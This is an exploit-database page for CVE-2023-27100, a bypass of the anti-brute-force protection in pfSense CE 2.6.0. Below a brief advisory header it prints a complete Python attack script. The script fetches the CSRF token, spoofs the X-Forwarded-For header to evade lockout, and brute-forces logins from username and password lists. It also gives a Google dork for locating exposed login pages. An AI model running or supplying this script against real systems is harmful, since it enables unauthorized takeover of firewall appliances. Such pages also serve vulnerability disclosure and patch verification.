pfsenseCE v2.6.0 - Anti-brute force protection bypass

vendor:

pfSense CE

by:

FabDotNET (Fabien MAISONNETTE)

9.8

CVSS

CRITICAL

Authentication Bypass

287

CWE

Product Name: pfSense CE

Affected Version From: pfSenseCE <= 2.6.0

Affected Version To: pfSenseCE <= 2.6.0

Patch Exists: YES

Related CWE: CVE-2023-27100

CPE: a:netgate:pfsense_ce:2.6.0

Metasploit:

Other Scripts:

Platforms Tested:

2023

pfsenseCE v2.6.0 – Anti-brute force protection bypass

This exploit allows an attacker to bypass the anti-brute force protection of pfsenseCE v2.6.0 by using a specially crafted POST request. The exploit is possible due to a lack of proper input validation and authentication checks.

Mitigation:

Upgrade to the latest version of pfsenseCE, which includes a patch for this vulnerability.

Source

Exploit-DB raw data:

#!/usr/bin/python3

## Exploit Title: pfsenseCE v2.6.0 - Anti-brute force protection bypass
## Google Dork: intitle:"pfSense - Login"
## Date: 2023-04-07
## Exploit Author: FabDotNET (Fabien MAISONNETTE)
## Vendor Homepage: https://www.pfsense.org/
## Software Link: https://atxfiles.netgate.com/mirror/downloads/pfSense-CE-2.6.0-RELEASE-amd64.iso.gz
## Version: pfSenseCE <= 2.6.0
## CVE: CVE-2023-27100

# Vulnerability
## CVE: CVE-2023-27100
## CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2023-27100
## Security Advisory: https://docs.netgate.com/downloads/pfSense-SA-23_05.sshguard.asc
## Patch: https://redmine.pfsense.org/projects/pfsense/repository/1/revisions/9633ec324eada0b870962d3682d264be577edc66

import requests
import sys
import re
import argparse
import textwrap
from urllib3.exceptions import InsecureRequestWarning

# Expected Arguments
parser = argparse.ArgumentParser(description="pfsenseCE <= 2.6.0 Anti-brute force protection bypass",
                                 formatter_class=argparse.RawTextHelpFormatter,
                                 epilog=textwrap.dedent(''' 
Exploit Usage : 
./CVE-2023-27100.py -l http://<pfSense>/ -u user.txt -p pass.txt
./CVE-2023-27100.py -l http://<pfSense>/ -u /Directory/user.txt -p /Directory/pass.txt'''))

parser.add_argument("-l", "--url", help="pfSense WebServer (Example: http://127.0.0.1/)")
parser.add_argument("-u", "--usersList", help="Username Dictionary")
parser.add_argument("-p", "--passwdList", help="Password Dictionary")
args = parser.parse_args()

if len(sys.argv) < 2:
    print(f"Exploit Usage: ./CVE-2023-27100.py -h [help] -l [url] -u [user.txt] -p [pass.txt]")
    sys.exit(1)

# Variable
url = args.url
usersList = args.usersList
passwdList = args.passwdList

# Suppress only the single warning from urllib3 needed.
if url.upper().startswith("HTTPS://"):
    requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

print('pfsenseCE <= 2.6.0 Anti-brute force protection bypass')


def login(userlogin, userpasswd):
    session = requests.session()
    r = session.get(url, verify=False)

    # Getting CSRF token value
    csrftoken = re.search(r'input type=\'hidden\' name=\'__csrf_magic\' value="(.*?)"', r.text)
    csrftoken = csrftoken.group(1)

    # Specifying Headers Value
    headerscontent = {
        'User-Agent': 'Mozilla/5.0',
        'Referer': f"{url}",
        'X-Forwarded-For': '42.42.42.42'
    }

    # POST REQ data
    postreqcontent = {
        '__csrf_magic': f"{csrftoken}",
        'usernamefld': f"{userlogin}",
        'passwordfld': f"{userpasswd}",
        'login': 'Sign+In'
    }

    # Sending POST REQ
    r = session.post(url, data=postreqcontent, headers=headerscontent, allow_redirects=False, verify=False)

    # Conditional loops
    if r.status_code != 200:
        print(f'[*] - Found Valid Credential !!')
        print(f"[*] - Use this Credential -> {userlogin}:{userpasswd}")
        sys.exit(0)


# Reading User.txt & Pass.txt files
userfile = open(usersList).readlines()
passfile = open(passwdList).readlines()

for user in userfile:
    user = user.strip()
    for passwd in passfile:
        passwd = passwd.strip()
        login(user, passwd)